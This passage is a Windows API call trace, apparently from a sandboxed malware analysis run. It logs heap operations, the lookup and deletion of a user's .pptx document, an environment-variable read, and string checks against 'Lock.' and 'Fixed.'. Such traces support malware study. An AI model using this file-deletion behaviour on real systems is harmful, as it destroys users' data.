dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0266.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0266.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0266.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0266.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0266.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0266.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0266.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0266.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0266.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24f2068 [0266.598] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/ZeVUVJRj4YhmoN71.pptx", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZeVUVJRj4YhmoN71.pptx", lpFilePart=0x8bedfc*="ZeVUVJRj4YhmoN71.pptx") returned 0x3d [0266.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0266.598] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZeVUVJRj4YhmoN71.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zevuvjrj4yhmon71.pptx")) returned 0x20 [0266.598] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZeVUVJRj4YhmoN71.pptx", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc815a370, ftCreationTime.dwHighDateTime=0x1d4d4fe, ftLastAccessTime.dwLowDateTime=0x30e7af10, ftLastAccessTime.dwHighDateTime=0x1d4b63c, ftLastWriteTime.dwLowDateTime=0x30e7af10, ftLastWriteTime.dwHighDateTime=0x1d4b63c, nFileSizeHigh=0x0, nFileSizeLow=0x174d9, dwReserved0=0x1f15, dwReserved1=0x4, cFileName="ZeVUVJRj4YhmoN71.pptx", cAlternateFileName="ZEVUVJ~1.PPT")) returned 0xaa5860 [0266.599] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZeVUVJRj4YhmoN71.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zevuvjrj4yhmon71.pptx")) returned 1 [0266.604] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc815a370, ftCreationTime.dwHighDateTime=0x1d4d4fe, ftLastAccessTime.dwLowDateTime=0x30e7af10, ftLastAccessTime.dwHighDateTime=0x1d4b63c, ftLastWriteTime.dwLowDateTime=0x30e7af10, ftLastWriteTime.dwHighDateTime=0x1d4b63c, nFileSizeHigh=0x0, nFileSizeLow=0x174d9, dwReserved0=0x1f15, dwReserved1=0x4, cFileName="ZeVUVJRj4YhmoN71.pptx", cAlternateFileName="ZEVUVJ~1.PPT")) returned 0 [0266.605] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0266.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0266.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0266.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0266.605] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0266.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0266.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0266.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0266.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0266.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0266.607] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0266.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0266.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0266.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0266.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0266.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0266.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f90 [0266.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0266.608] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0266.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0266.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0266.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0266.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0266.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0266.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0266.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0266.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0266.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0266.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0266.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0266.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0266.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0266.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0266.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0266.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0266.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0266.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0266.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0266.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0266.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0266.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0266.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0266.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0266.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0266.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0266.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0266.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0266.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0266.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0266.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24f2068 [0266.612] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/ZeVUVJRj4YhmoN71.pptx", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZeVUVJRj4YhmoN71.pptx", lpFilePart=0x8bf658*="ZeVUVJRj4YhmoN71.pptx") returned 0x3d [0266.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0266.612] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZeVUVJRj4YhmoN71.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zevuvjrj4yhmon71.pptx")) returned 0xffffffff [0266.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0266.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0266.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0266.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0266.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0266.613] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0266.614] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.614] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0266.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0266.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0266.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0266.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0266.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0266.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0266.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0266.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0266.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0266.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zq0bBrnPbhA3GBBLi8", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q0bBrnPbhA3GBBLi8", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0bBrnPbhA3GBBLi8", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bBrnPbhA3GBBLi8", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BrnPbhA3GBBLi8", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rnPbhA3GBBLi8", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nPbhA3GBBLi8", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PbhA3GBBLi8", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhA3GBBLi8", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hA3GBBLi8", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A3GBBLi8", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3GBBLi8", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GBBLi8", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BBLi8", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0266.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.617] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0266.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0266.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0266.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0266.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zq0bBrnPbhA3GBBLi8", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q0bBrnPbhA3GBBLi8", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0bBrnPbhA3GBBLi8", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bBrnPbhA3GBBLi8", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BrnPbhA3GBBLi8", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rnPbhA3GBBLi8", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nPbhA3GBBLi8", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PbhA3GBBLi8", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhA3GBBLi8", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hA3GBBLi8", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A3GBBLi8", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3GBBLi8", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GBBLi8", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.618] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0266.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0266.619] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0266.619] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0266.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0266.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0266.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0266.619] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0266.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0266.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0266.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0266.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.620] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 1 [0266.620] TranslateMessage (lpMsg=0x8bf710) returned 0 [0266.621] DispatchMessageW (lpMsg=0x8bf710) returned 0x0 [0266.621] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0266.621] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0266.621] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0266.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0266.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0266.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0266.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0266.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0266.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0266.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0266.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0266.622] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0266.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0266.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0266.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0266.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0266.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0266.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0266.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0266.623] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.623] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0266.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0266.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0266.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0266.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0266.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0266.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0266.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0266.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0266.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0266.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0266.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0266.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0266.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0266.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0266.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 